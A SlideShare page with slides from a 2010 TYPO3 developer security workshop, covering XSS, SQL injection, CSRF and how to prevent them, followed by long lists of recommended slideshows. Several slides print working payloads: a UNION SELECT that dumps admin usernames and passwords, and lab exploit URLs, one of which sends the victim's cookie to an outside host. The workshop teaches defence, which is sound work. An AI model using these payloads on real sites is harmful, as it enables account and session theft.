SlideShare una empresa de Scribd logo

T3DD10 Security Workshop

Helmut Hummel
Helmut Hummel

Slides of the T3DD10 Security Workshop

TecnologíaNoticias y política
1 de 59
TYPO3 Developer Days - Elmshorn 2010 Inspiring Security Workshop sha
T3DD10 Security Security flaws versus Security concepts 02.07.2010 Helmut Hummel <helmut@typo3.org>
Introduction Do you ... Inspiring people to T3DD10 Security Workshop share
Introduction Do you ... ... know me? Inspiring people to T3DD10 Security Workshop share
Introduction Do you ... ... know me? ... have a working development environment? Inspiring people to T3DD10 Security Workshop share
Introduction Do you ... ... know me? ... have a working development environment? ... ever heared of XSS? Inspiring people to T3DD10 Security Workshop share
Introduction Do you ... ... know me? ... have a working development environment? ... ever heared of XSS? ... ever heared of SQLi? Inspiring people to T3DD10 Security Workshop share
Introduction Do you ... ... know me? ... have a working development environment? ... ever heared of XSS? ... ever heared of SQLi? ... ever heared of CSRF? Inspiring people to T3DD10 Security Workshop share
Introduction Do you ... ... know me? ... have a working development environment? ... ever heared of XSS? ... ever heared of SQLi? ... ever heared of CSRF? ... ever found a vulnerability in a TYPO3 extension? Inspiring people to T3DD10 Security Workshop share
Introduction Do you ... ... know me? ... have a working development environment? ... ever heared of XSS? ... ever heared of SQLi? ... ever heared of CSRF? ... ever found a vulnerability in a TYPO3 extension? ... reported your findings to security@typo3.org? Inspiring people to T3DD10 Security Workshop share
Did you ever hack for Inspiring people to T3DD10 Security Workshop share
Security Flaws versus Security Concepts Agenda General Security Concepts Hacking / Code Review Session Getting into details about some vulnerabilitiy types Writing down best practices for TYPO3 developers Inspiring people to T3DD10 Security Workshop share
What is Security? Inspiring people to T3DD10 Security Workshop share
Security is not a state Inspiring people to T3DD10 Security Workshop share
What is Security? Security is a process Inspiring people to T3DD10 Security Workshop share
What is Security? Security is a process The security of an application must be proven over time Inspiring people to T3DD10 Security Workshop share
What is Security? Security is a process The security of an application must be proven over time Security must constantly be improved Inspiring people to T3DD10 Security Workshop share
What is Security? Security is a process The security of an application must be proven over time Security must constantly be improved An application can never be secure ... Inspiring people to T3DD10 Security Workshop share
What is Security? Security is a process The security of an application must be proven over time Security must constantly be improved An application can never be secure ... ... but only not insecure at a particular time Inspiring people to T3DD10 Security Workshop share
What is Security? Security is a process The security of an application must be proven over time Security must constantly be improved An application can never be secure ... ... but only not insecure at a particular time The „costs“ for security must relate to the possible impacts Inspiring people to T3DD10 Security Workshop share
What is Security? General Security Concepts Inspiring people to T3DD10 Security Workshop share
What is Security? General Security Concepts Minimize Exposure / Least privilege Inspiring people to T3DD10 Security Workshop share
What is Security? General Security Concepts Minimize Exposure / Least privilege Don‘t trust user data, don‘t trust Services Inspiring people to T3DD10 Security Workshop share
What is Security? General Security Concepts Minimize Exposure / Least privilege Don‘t trust user data, don‘t trust Services Filter->Validate->Escape never mix them up Inspiring people to T3DD10 Security Workshop share
What is Security? General Security Concepts Minimize Exposure / Least privilege Don‘t trust user data, don‘t trust Services Filter->Validate->Escape never mix them up Defense in depth Inspiring people to T3DD10 Security Workshop share
What is Security? General Security Concepts Minimize Exposure / Least privilege Don‘t trust user data, don‘t trust Services Filter->Validate->Escape never mix them up Defense in depth Positive Security Model (Whitelist) Inspiring people to T3DD10 Security Workshop share
What is Security? General Security Concepts Minimize Exposure / Least privilege Don‘t trust user data, don‘t trust Services Filter->Validate->Escape never mix them up Defense in depth Positive Security Model (Whitelist) Use logging Inspiring people to T3DD10 Security Workshop share
What is Security? General Security Concepts Minimize Exposure / Least privilege Don‘t trust user data, don‘t trust Services Filter->Validate->Escape never mix them up Defense in depth Positive Security Model (Whitelist) Use logging Avoid security by obscurity Inspiring people to T3DD10 Security Workshop share
Cross Site Scripting (XSS) Inspiring people to T3DD10 Security Workshop share
Cross Site Scripting XSS Inspiring people to T3DD10 Security Workshop share
Cross Site Scripting XSS Persitent/ non persistent XSS Inspiring people to T3DD10 Security Workshop share
Cross Site Scripting XSS Persitent/ non persistent XSS Injecting Up / Break out of the current DOM context Inspiring people to T3DD10 Security Workshop share
Cross Site Scripting XSS Persitent/ non persistent XSS Injecting Up / Break out of the current DOM context Injecting Down Inspiring people to T3DD10 Security Workshop share
Cross Site Scripting XSS Persitent/ non persistent XSS Injecting Up / Break out of the current DOM context Injecting Down Stay in the current context, but use the possibiities Inspiring people to T3DD10 Security Workshop share
Cross Site Scripting XSS Persitent/ non persistent XSS Injecting Up / Break out of the current DOM context Injecting Down Stay in the current context, but use the possibiities <img src="javascript:alert(document.cookie)" / > Inspiring people to T3DD10 Security Workshop share
Cross Site Scripting Preventing XSS Inspiring people to T3DD10 Security Workshop share
Cross Site Scripting Preventing XSS Input validation and/or filtering is not enough Inspiring people to T3DD10 Security Workshop share
Cross Site Scripting Preventing XSS Input validation and/or filtering is not enough Escape correctly, depending on the context Inspiring people to T3DD10 Security Workshop share
Cross Site Scripting Preventing XSS Input validation and/or filtering is not enough Escape correctly, depending on the context <script>...NEVER PUT UNTRUSTED DATA HERE...</script> <img src=“... OR HERE ...“ /> ... because then you‘re doomed Inspiring people to T3DD10 Security Workshop share
Email Header Injection Inspiring people to T3DD10 Security Workshop share
Email Header Injection Email Header Injection PHP mail() function and From: header Use filter_var($mail, FILTER_VALIDATE_EMAIL) do not allow chr(10) or chr(13) Inspiring people to T3DD10 Security Workshop share
SQL Injection (SQLi) Inspiring people to T3DD10 Security Workshop share
SQL Injection SQLi (blind) SQL Injections Timing attacs UNION SELECT Example: union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,user name,password,0 from be_users where admin in(1) Check your TypoScript! Inspiring people to T3DD10 Security Workshop share
SQL Injection Prevent SQLi Inspiring people to T3DD10 Security Workshop share
SQL Injection Prevent SQLi Prepared Statements / PDO Inspiring people to T3DD10 Security Workshop share
SQL Injection Prevent SQLi Prepared Statements / PDO Escaping Inspiring people to T3DD10 Security Workshop share
SQL Injection Prevent SQLi Prepared Statements / PDO Escaping Typecasting (intval), whitelist validation Inspiring people to T3DD10 Security Workshop share
SQL Injection Prevent SQLi Prepared Statements / PDO Escaping Typecasting (intval), whitelist validation Using an ORM (extbase, FLOW3, QCodo, ...) Inspiring people to T3DD10 Security Workshop share
Cross Site Request Forgery Inspiring people to T3DD10 Security Workshop share
Cross Site Request Forgery CSRF Executing arbitrary actions on behalf of a victim <img src="http://bank.com/transfer.do? acct=MARIA&amount=100000" width="1" height="1" border="0"> stored CSRF (like XSS) Targeted Emails Requires probably some kind of social engineering Inspiring people to T3DD10 Security Workshop share
Cross Site Request Forgery Prevent CSRF Limiting to POST and checking referrer not enough Double Submit Cookies Challenge-Response Synchronizer Token Pattern No Cross-Site Scripting (XSS) Vulnerabilities
Application Vulnerabilities More
Application Vulnerabilities More Information Disclosure HTTP Response Splitting Path Traversal Privilege Escalation Session Fixation LPAP Injection Remote Code Execution
T3DD10 Security Workshop Rescources PHP-Sicherheit (Christopher Kunz and Stefan Esser) Essential PHP Security (Chris Shiflett) http://www.owasp.org/ http://www.ibm.com/developerworks/ opensource/library/os-php-secure-apps/ index.html http://www.owasp.org/index.php/ Category:OWASP_WebGoat_Project Inspiring people to T3DD10 Security Workshop share
T3DD10 Security Workshop SQLi Exploit http://192.168.100.139/introductionpackage/ t3dd10/pi1/? no_cache=1&tx_coolextension_pi1[showUid]=1%2 0UNION%20SELECT%20uid,%20pid,%20tstamp, %20crdate,%20cruser_id,uid%20as %20t3ver_oid,uid%20as%20t3ver_id,uid%20as %20t3ver_wsid,uid%20as%20t3ver_label,uid%20as %20t3ver_state,%20uid%20as%20t3ver_stage,uid %20as%20t3ver_count,uid%20as %20t3ver_tstamp,uid%20as%20t3_origuid,uid %20as%20sys_language_uid,uid%20as %20l10n_parent,uid%20as %20l10n_diffsource,deleted,disable%20as %20hidden,starttime,endtime,%20usergroup%20as %20fe_group,username%20as
T3DD10 Security Workshop XSS Exploit http://192.168.100.139/introductionpackage/ t3dd10/pi2/? no_cache=1&tx_coolextension_pi2[name]= %22+type%3D%22hidden%22%2F%3E%3Cscript %3Ewindow.location.href+%3D+%27http%3A%2F %2Ftypo3.org%2F%3Fcookie%3D%27+%2B +document.cookie%3B%3C%2Fscript%3E
T3DD10 Security Workshop XSS Exploit bit.ly/bpJzpF http://192.168.100.139/introductionpackage/ t3dd10/pi2/? no_cache=1&tx_coolextension_pi2[name]= %22+type%3D%22hidden%22%2F%3E%3C%2Fform %3E%3Cform+action%3D%22http%3A%2F %2Ftypo3.org%22%3E%3Cinput+type%3D%22text %22+name%3D%22name
inspiring people to share.

Recomendados

Diary of a Hack
Diary of a HackDiary of a Hack
Diary of a HackHelmut Hummel
 
TYPO3 Surf Introduction
TYPO3 Surf IntroductionTYPO3 Surf Introduction
TYPO3 Surf IntroductionHelmut Hummel
 
T3DD11 Security Workshop
T3DD11 Security WorkshopT3DD11 Security Workshop
T3DD11 Security WorkshopHelmut Hummel
 
Security Through Gamification
Security Through GamificationSecurity Through Gamification
Security Through GamificationMarius Corici
 
CTF365 - Security Training Platform
CTF365 - Security Training PlatformCTF365 - Security Training Platform
CTF365 - Security Training PlatformMarius Corîci
 
Application Security - Myth or Fact Slides
Application Security - Myth or Fact SlidesApplication Security - Myth or Fact Slides
Application Security - Myth or Fact Slidesdfgrumpy
 
Developing a Rugged DevOps Approach to Cloud Security
Developing a Rugged DevOps Approach to Cloud SecurityDeveloping a Rugged DevOps Approach to Cloud Security
Developing a Rugged DevOps Approach to Cloud SecurityTechWell
 
Security Best Practices
Security Best PracticesSecurity Best Practices
Security Best PracticesClint Edmonson
 

Recomendados

Diary of a Hack
Diary of a HackDiary of a Hack
Diary of a HackHelmut Hummel
 
TYPO3 Surf Introduction
TYPO3 Surf IntroductionTYPO3 Surf Introduction
TYPO3 Surf IntroductionHelmut Hummel
 
T3DD11 Security Workshop
T3DD11 Security WorkshopT3DD11 Security Workshop
T3DD11 Security WorkshopHelmut Hummel
 
Security Through Gamification
Security Through GamificationSecurity Through Gamification
Security Through GamificationMarius Corici
 
CTF365 - Security Training Platform
CTF365 - Security Training PlatformCTF365 - Security Training Platform
CTF365 - Security Training PlatformMarius Corîci
 
Application Security - Myth or Fact Slides
Application Security - Myth or Fact SlidesApplication Security - Myth or Fact Slides
Application Security - Myth or Fact Slidesdfgrumpy
 
Developing a Rugged DevOps Approach to Cloud Security
Developing a Rugged DevOps Approach to Cloud SecurityDeveloping a Rugged DevOps Approach to Cloud Security
Developing a Rugged DevOps Approach to Cloud SecurityTechWell
 
Security Best Practices
Security Best PracticesSecurity Best Practices
Security Best PracticesClint Edmonson
 
Security of Web Applications: Top 6 Risks To Avoid
Security of Web Applications: Top 6 Risks To AvoidSecurity of Web Applications: Top 6 Risks To Avoid
Security of Web Applications: Top 6 Risks To Avoidslicklash
 
Security & App Development - CSO Summit Mid 2014
Security & App Development - CSO Summit Mid 2014Security & App Development - CSO Summit Mid 2014
Security & App Development - CSO Summit Mid 2014Amod Malviya (आमोद मालवीय, ಆಮೋದ ಮಾಲವೀಯ)
 
TYPO3 Security - Risks and Mitigation
TYPO3 Security - Risks and MitigationTYPO3 Security - Risks and Mitigation
TYPO3 Security - Risks and MitigationHelmut Hummel
 
Cyber Security Presentation By(Aashish Tanania)
Cyber Security Presentation By(Aashish Tanania)Cyber Security Presentation By(Aashish Tanania)
Cyber Security Presentation By(Aashish Tanania)AashishTanania
 
Distributed Immutable Ephemeral - New Paradigms for the Next Era of Security
Distributed Immutable Ephemeral - New Paradigms for the Next Era of SecurityDistributed Immutable Ephemeral - New Paradigms for the Next Era of Security
Distributed Immutable Ephemeral - New Paradigms for the Next Era of SecuritySounil Yu
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 
Security testing for web developers
Security testing for web developersSecurity testing for web developers
Security testing for web developersmatthewhughes
 
The Principles of Secure Development - David Rook
The Principles of Secure Development - David RookThe Principles of Secure Development - David Rook
The Principles of Secure Development - David RookSecurity B-Sides
 
Reversing & Malware Analysis Training Part 13 - Future Roadmap
Reversing & Malware Analysis Training Part 13 - Future RoadmapReversing & Malware Analysis Training Part 13 - Future Roadmap
Reversing & Malware Analysis Training Part 13 - Future Roadmapsecurityxploded
 
Cybersecurity Interview Questions and Answers | CyberSecurity Interview Tips ...
Cybersecurity Interview Questions and Answers | CyberSecurity Interview Tips ...Cybersecurity Interview Questions and Answers | CyberSecurity Interview Tips ...
Cybersecurity Interview Questions and Answers | CyberSecurity Interview Tips ...Edureka!
 
The Next Generation Security
The Next Generation SecurityThe Next Generation Security
The Next Generation SecurityCybera Inc.
 
Integrating OMS and Azure Security Center for Enhanced Cloud Security
Integrating OMS and Azure Security Center for Enhanced Cloud SecurityIntegrating OMS and Azure Security Center for Enhanced Cloud Security
Integrating OMS and Azure Security Center for Enhanced Cloud SecurityMaryJWilliams2
 
Maximizing Cloud Security and Efficiency: A Guide to Integrating OMS and Azur...
Maximizing Cloud Security and Efficiency: A Guide to Integrating OMS and Azur...Maximizing Cloud Security and Efficiency: A Guide to Integrating OMS and Azur...
Maximizing Cloud Security and Efficiency: A Guide to Integrating OMS and Azur...MaryJWilliams2
 
This World of Ours
This World of OursThis World of Ours
This World of Oursslicklash
 
So... you want to be a security consultant
So... you want to be a security consultant So... you want to be a security consultant
So... you want to be a security consultant abnmi
 
Check Point Consolidation
Check Point ConsolidationCheck Point Consolidation
Check Point ConsolidationGroup of company MUK
 
You are Doing IT Security Wrong - Understanding the Threat of Modern Cyber-at...
You are Doing IT Security Wrong - Understanding the Threat of Modern Cyber-at...You are Doing IT Security Wrong - Understanding the Threat of Modern Cyber-at...
You are Doing IT Security Wrong - Understanding the Threat of Modern Cyber-at...Michael Noel
 
CYBER CRIME Presentation npccsm college kadi
CYBER CRIME Presentation npccsm college kadiCYBER CRIME Presentation npccsm college kadi
CYBER CRIME Presentation npccsm college kadiashwanip7461
 
Charting a Career in Information Security - August 2020
Charting a Career in Information Security - August 2020Charting a Career in Information Security - August 2020
Charting a Career in Information Security - August 2020JayTymchuk
 
CMST&210 Pillow talk Position 1 Why do you think you may.docx
CMST&210 Pillow talk Position 1 Why do you think you may.docxCMST&210 Pillow talk Position 1 Why do you think you may.docx
CMST&210 Pillow talk Position 1 Why do you think you may.docxmccormicknadine86
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxLoriGlavin3
 

Más contenido relacionado

Similar a T3DD10 Security Workshop

Security of Web Applications: Top 6 Risks To Avoid
Security of Web Applications: Top 6 Risks To AvoidSecurity of Web Applications: Top 6 Risks To Avoid
Security of Web Applications: Top 6 Risks To Avoidslicklash
 
TYPO3 Security - Risks and Mitigation
TYPO3 Security - Risks and MitigationTYPO3 Security - Risks and Mitigation
TYPO3 Security - Risks and MitigationHelmut Hummel
 
Cyber Security Presentation By(Aashish Tanania)
Cyber Security Presentation By(Aashish Tanania)Cyber Security Presentation By(Aashish Tanania)
Cyber Security Presentation By(Aashish Tanania)AashishTanania
 
Distributed Immutable Ephemeral - New Paradigms for the Next Era of Security
Distributed Immutable Ephemeral - New Paradigms for the Next Era of SecurityDistributed Immutable Ephemeral - New Paradigms for the Next Era of Security
Distributed Immutable Ephemeral - New Paradigms for the Next Era of SecuritySounil Yu
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 
Security testing for web developers
Security testing for web developersSecurity testing for web developers
Security testing for web developersmatthewhughes
 
The Principles of Secure Development - David Rook
The Principles of Secure Development - David RookThe Principles of Secure Development - David Rook
The Principles of Secure Development - David RookSecurity B-Sides
 
Reversing & Malware Analysis Training Part 13 - Future Roadmap
Reversing & Malware Analysis Training Part 13 - Future RoadmapReversing & Malware Analysis Training Part 13 - Future Roadmap
Reversing & Malware Analysis Training Part 13 - Future Roadmapsecurityxploded
 
Cybersecurity Interview Questions and Answers | CyberSecurity Interview Tips ...
Cybersecurity Interview Questions and Answers | CyberSecurity Interview Tips ...Cybersecurity Interview Questions and Answers | CyberSecurity Interview Tips ...
Cybersecurity Interview Questions and Answers | CyberSecurity Interview Tips ...Edureka!
 
The Next Generation Security
The Next Generation SecurityThe Next Generation Security
The Next Generation SecurityCybera Inc.
 
Integrating OMS and Azure Security Center for Enhanced Cloud Security
Integrating OMS and Azure Security Center for Enhanced Cloud SecurityIntegrating OMS and Azure Security Center for Enhanced Cloud Security
Integrating OMS and Azure Security Center for Enhanced Cloud SecurityMaryJWilliams2
 
Maximizing Cloud Security and Efficiency: A Guide to Integrating OMS and Azur...
Maximizing Cloud Security and Efficiency: A Guide to Integrating OMS and Azur...Maximizing Cloud Security and Efficiency: A Guide to Integrating OMS and Azur...
Maximizing Cloud Security and Efficiency: A Guide to Integrating OMS and Azur...MaryJWilliams2
 
This World of Ours
This World of OursThis World of Ours
This World of Oursslicklash
 
So... you want to be a security consultant
So... you want to be a security consultant So... you want to be a security consultant
So... you want to be a security consultant abnmi
 
You are Doing IT Security Wrong - Understanding the Threat of Modern Cyber-at...
You are Doing IT Security Wrong - Understanding the Threat of Modern Cyber-at...You are Doing IT Security Wrong - Understanding the Threat of Modern Cyber-at...
You are Doing IT Security Wrong - Understanding the Threat of Modern Cyber-at...Michael Noel
 
CYBER CRIME Presentation npccsm college kadi
CYBER CRIME Presentation npccsm college kadiCYBER CRIME Presentation npccsm college kadi
CYBER CRIME Presentation npccsm college kadiashwanip7461
 
Charting a Career in Information Security - August 2020
Charting a Career in Information Security - August 2020Charting a Career in Information Security - August 2020
Charting a Career in Information Security - August 2020JayTymchuk
 
CMST&210 Pillow talk Position 1 Why do you think you may.docx
CMST&210 Pillow talk Position 1 Why do you think you may.docxCMST&210 Pillow talk Position 1 Why do you think you may.docx
CMST&210 Pillow talk Position 1 Why do you think you may.docxmccormicknadine86
 

Similar a T3DD10 Security Workshop (20)

Security of Web Applications: Top 6 Risks To Avoid
Security of Web Applications: Top 6 Risks To AvoidSecurity of Web Applications: Top 6 Risks To Avoid
Security of Web Applications: Top 6 Risks To Avoid
 
Security & App Development - CSO Summit Mid 2014
Security & App Development - CSO Summit Mid 2014Security & App Development - CSO Summit Mid 2014
Security & App Development - CSO Summit Mid 2014
 
TYPO3 Security - Risks and Mitigation
TYPO3 Security - Risks and MitigationTYPO3 Security - Risks and Mitigation
TYPO3 Security - Risks and Mitigation
 
Cyber Security Presentation By(Aashish Tanania)
Cyber Security Presentation By(Aashish Tanania)Cyber Security Presentation By(Aashish Tanania)
Cyber Security Presentation By(Aashish Tanania)
 
Distributed Immutable Ephemeral - New Paradigms for the Next Era of Security
Distributed Immutable Ephemeral - New Paradigms for the Next Era of SecurityDistributed Immutable Ephemeral - New Paradigms for the Next Era of Security
Distributed Immutable Ephemeral - New Paradigms for the Next Era of Security
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
Security testing for web developers
Security testing for web developersSecurity testing for web developers
Security testing for web developers
 
The Principles of Secure Development - David Rook
The Principles of Secure Development - David RookThe Principles of Secure Development - David Rook
The Principles of Secure Development - David Rook
 
Reversing & Malware Analysis Training Part 13 - Future Roadmap
Reversing & Malware Analysis Training Part 13 - Future RoadmapReversing & Malware Analysis Training Part 13 - Future Roadmap
Reversing & Malware Analysis Training Part 13 - Future Roadmap
 
Cybersecurity Interview Questions and Answers | CyberSecurity Interview Tips ...
Cybersecurity Interview Questions and Answers | CyberSecurity Interview Tips ...Cybersecurity Interview Questions and Answers | CyberSecurity Interview Tips ...
Cybersecurity Interview Questions and Answers | CyberSecurity Interview Tips ...
 
The Next Generation Security
The Next Generation SecurityThe Next Generation Security
The Next Generation Security
 
Integrating OMS and Azure Security Center for Enhanced Cloud Security
Integrating OMS and Azure Security Center for Enhanced Cloud SecurityIntegrating OMS and Azure Security Center for Enhanced Cloud Security
Integrating OMS and Azure Security Center for Enhanced Cloud Security
 
Maximizing Cloud Security and Efficiency: A Guide to Integrating OMS and Azur...
Maximizing Cloud Security and Efficiency: A Guide to Integrating OMS and Azur...Maximizing Cloud Security and Efficiency: A Guide to Integrating OMS and Azur...
Maximizing Cloud Security and Efficiency: A Guide to Integrating OMS and Azur...
 
This World of Ours
This World of OursThis World of Ours
This World of Ours
 
So... you want to be a security consultant
So... you want to be a security consultant So... you want to be a security consultant
So... you want to be a security consultant
 
Check Point Consolidation
Check Point ConsolidationCheck Point Consolidation
Check Point Consolidation
 
You are Doing IT Security Wrong - Understanding the Threat of Modern Cyber-at...
You are Doing IT Security Wrong - Understanding the Threat of Modern Cyber-at...You are Doing IT Security Wrong - Understanding the Threat of Modern Cyber-at...
You are Doing IT Security Wrong - Understanding the Threat of Modern Cyber-at...
 
CYBER CRIME Presentation npccsm college kadi
CYBER CRIME Presentation npccsm college kadiCYBER CRIME Presentation npccsm college kadi
CYBER CRIME Presentation npccsm college kadi
 
Charting a Career in Information Security - August 2020
Charting a Career in Information Security - August 2020Charting a Career in Information Security - August 2020
Charting a Career in Information Security - August 2020
 
CMST&210 Pillow talk Position 1 Why do you think you may.docx
CMST&210 Pillow talk Position 1 Why do you think you may.docxCMST&210 Pillow talk Position 1 Why do you think you may.docx
CMST&210 Pillow talk Position 1 Why do you think you may.docx
 

Último

"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxLoriGlavin3
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxLoriGlavin3
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxLoriGlavin3
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningLars Bell
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyAlfredo García Lavilla
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfPrecisely
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfMounikaPolabathina
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESmohitsingh558521
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenHervé Boutemy
 

Último (20)

"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine Tuning
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
